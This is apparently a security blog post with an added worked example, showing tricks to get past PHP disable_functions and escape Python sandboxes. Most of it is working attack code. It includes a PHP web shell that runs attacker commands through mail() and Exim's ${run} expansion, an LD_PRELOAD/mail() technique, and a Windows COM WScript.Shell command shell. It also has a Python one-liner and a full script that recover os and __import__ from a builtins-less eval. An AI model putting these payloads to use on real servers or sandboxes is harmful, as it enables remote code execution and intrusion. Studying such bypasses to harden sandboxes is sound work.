Some simple bypass tricks

Th3Law, SoulSecTeam
Published Feb 18, 2019 (2 min read)

Bypass Disable Functions

Configuration

Assume php.ini blocks the usual command-execution functions. Note what is not on the list: mail() and putenv() stay callable, and both Linux tricks below depend on that.

disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system

Linux

  • sendmail -> exim bypass

PHP's mail() hands its fifth argument to the sendmail binary as extra command-line options. When that binary is Exim, -be switches it into string-expansion test mode, and ${run{...}} inside the expanded string executes a command. A literal space would split the option into separate arguments, so the space between /bin/sh and the script path is produced with ${substr{10}{1}{$tod_log}}: $tod_log expands to a "YYYY-MM-DD HH:MM:SS" timestamp, and character 10 of it is a space.

<?php
// Two distinct scratch files: one holds the command to run, the other collects its output
// (if both point at the same path, the shell script overwrites itself while running).
$command_file = "/tmp/xxxx_cmd";
$output_file = "/tmp/xxxx_out";
$cmd = isset($argv[1]) ? $argv[1] : $_GET['cmd']; // CLI argument or ?cmd= parameter
$cmd = "$cmd > $output_file";
file_put_contents($command_file, $cmd);
// Fifth argument = extra options for sendmail. With Exim, -be expands the string and
// ${run{...}} runs "/bin/sh <command_file>"; tmp1/tmp2 are just harmless filler tokens.
mail("root@localhost", "xnxx", "jav", null,
'-xnxxjav@jav(tmp1 -be ${run{/bin/sh${substr{10}{1}{$tod_log}}'.$command_file.'}} tmp2)');
echo file_get_contents($output_file);
unlink($output_file);
unlink($command_file);
  • LD_PRELOAD bypass

putenv() is not disabled either, so set LD_PRELOAD to a shared object whose constructor runs the payload, then call mail(): PHP forks the sendmail binary with that environment, the dynamic loader pulls the library into the child process, and the code runs outside the reach of disable_functions.

tools : Chankro, which automates this (drops the shared object, sets LD_PRELOAD and triggers mail() from a generated PHP file)

Windows

  • use COM to bypass

disable_functions only blocks PHP functions. If the COM extension is loaded, WScript.Shell is still reachable and its Exec() spawns a process.

<?php
// Requires the COM extension (extension=php_com_dotnet.dll on Windows builds of PHP).
$runCommand = "C:\\WINDOWS\\system32\\cmd.exe /c {$_GET['cmd']}"; //Wrong by purpose to get some good output
$WshShell = new COM("WScript.Shell");
$output = $WshShell->Exec($runCommand)->StdOut->ReadAll(); // Exec() returns a WshScriptExec; read its stdout stream
echo "<p>$output</p>";
?>

Bypass Python Sandbox

Python

__builtins__ is a reference to the builtins module, the namespace where open, __import__, getattr and friends live:

python2: __builtin__
python3: builtins

A typical sandbox empties or replaces it, so the escape has to reach modules another way: through attributes of objects the code can still create.

Tactic

1. Starting from any object the sandbox lets you create, walk up to object and enumerate its direct subclasses:

[].__class__.__base__.__subclasses__()

2. For a class defined in Python, the globals of its __init__ function are the namespace of the module that defined it, including everything that module imported:

cls.__init__.__globals__

3. Some of the classes found in step 1 are defined in modules that imported os or sys (on a normal interpreter the site and warnings modules provide these):

python2:
<class 'site._Printer'>
<class 'site.Quitter'>
<class 'warnings.catch_warnings'>
<class 'warnings.WarningMessage'>
python3:
<class '_sitebuiltins.Quitter'>
<class '_sitebuiltins._Printer'>

Apply step 2 to one of them to reach sys, and from sys.modules the os module.

4. More variations on these tricks exist; the modules listed below are good starting points.

Some interesting standard modules (the Python 2 docs are linked; types.FileType and the commands module do not exist in Python 3, and platform.popen was deprecated in 3.3 and removed in 3.8):

- types: https://docs.python.org/2/library/types.html
  types.FileType - read files (Python 2 only)
- timeit: https://docs.python.org/2/library/timeit.html
  timeit.timeit - execute code passed as a string
- inspect: https://docs.python.org/2/library/inspect.html
  inspect.getmembers - inspect objects to map out the code structure
- pickle: https://docs.python.org/2/library/pickle.html
  pickle.loads - execute commands via a crafted pickle
- os: https://docs.python.org/2/library/os.html
  os.popen - execute commands
- commands: https://docs.python.org/2/library/commands.html
  commands.getstatusoutput - execute commands (Python 2 only)
- subprocess: https://docs.python.org/2/library/subprocess.html
  subprocess.Popen - execute commands
- io: https://docs.python.org/2/library/io.html
  io.open - read files
- platform: https://docs.python.org/2/library/platform.html
  platform.popen - execute commands (removed in Python 3.8)

Final example

Putting the steps together in one expression (python3). 1..__class__ is float (1. is a float literal, so no builtin name is needed to get a starting object), and the 'sy'+'s' style concatenation is there to slip past simple keyword blacklists:

[w for w in 1..__class__.__base__.__subclasses__() if w.__name__=='Quitter'][0].__init__.__globals__['sy'+'s'].modules['o'+'s'].__dict__['sy'+'stem']('ls')
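The four steps of the tactic and the final one-liner, carried through as an added worked example (not code from the original post). It builds the weak sandbox the post assumes, an eval() whose __builtins__ has been emptied, and escapes it with a payload that does not name Quitter at all: any class whose __init__ is a Python function and whose module imported sys will do, which keeps the payload working across interpreter versions. From sys it recovers os and, via sys.modules['builtins'], a live __import__. The sandbox itself and the helper names (run_sandboxed, SYS_EXPR, escaped_sys, escaped_os, escaped_import, pivot_classes) are this example's, not the post's.

```python
"""
Added example: reaching os (and __import__) from inside a builtins-less eval()
sandbox by walking object.__subclasses__(), without naming any class.
"""
import os
import sys


def run_sandboxed(expr: str):
    """The weak sandbox under attack: eval() a single expression with no builtins,
    so __import__, open, getattr, dir, ... are all unavailable by name."""
    return eval(expr, {"__builtins__": {}}, {})


# Step 1: a literal -> its class -> object -> object.__subclasses__().
# Steps 2/3: keep classes whose __init__ is a Python function (C slot wrappers carry
#            no __globals__) and whose defining module imported sys; take sys from there.
SYS_EXPR = (
    "[c for c in ().__class__.__base__.__subclasses__()"
    " if c.__init__.__class__.__name__ == 'function'"
    " and 'sys' in c.__init__.__globals__]"
    "[0].__init__.__globals__['sys']"
)


def escaped_sys():
    """The real sys module, recovered from inside the sandbox."""
    return run_sandboxed(SYS_EXPR)


def escaped_os():
    """os is imported during interpreter start-up, so it already sits in sys.modules."""
    return run_sandboxed(SYS_EXPR + ".modules['os']")


def escaped_import(name: str):
    """sys.modules['builtins'] is the module __builtins__ pointed to before the sandbox
    emptied it; its __import__ brings back anything else (subprocess, pickle, ...)."""
    return run_sandboxed(SYS_EXPR + ".modules['builtins'].__import__(%r)" % name)


def pivot_classes():
    """Outside the sandbox: the direct subclasses of object the payload could pivot
    through, i.e. those whose __init__ globals expose sys or os. On a normal
    interpreter this includes the _sitebuiltins classes listed in step 3."""
    return sorted(
        (cls.__module__, cls.__name__)
        for cls in object.__subclasses__()
        if isinstance(getattr(cls.__init__, "__globals__", None), dict)
        and ({"sys", "os"} & set(cls.__init__.__globals__))
    )


if __name__ == "__main__":
    for mod, name in pivot_classes():
        print(f"pivot candidate: {mod}.{name}")
    print("os recovered:", escaped_os() is os)
    print("cwd via escaped os.getcwd():", escaped_os().getcwd())
    print("subprocess re-imported:", escaped_import("subprocess").__name__)
```

The payload string never references a builtin name, so stripping __builtins__ buys the sandbox nothing; a sandbox that wants to survive this has to block attribute access to dunders such as __class__, __subclasses__ and __globals__ as well, or run untrusted code in a separate process with OS-level isolation instead.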


I hack things, write things and break things. No system is safe! I'm a Security Researcher. LawSoul from SentinelX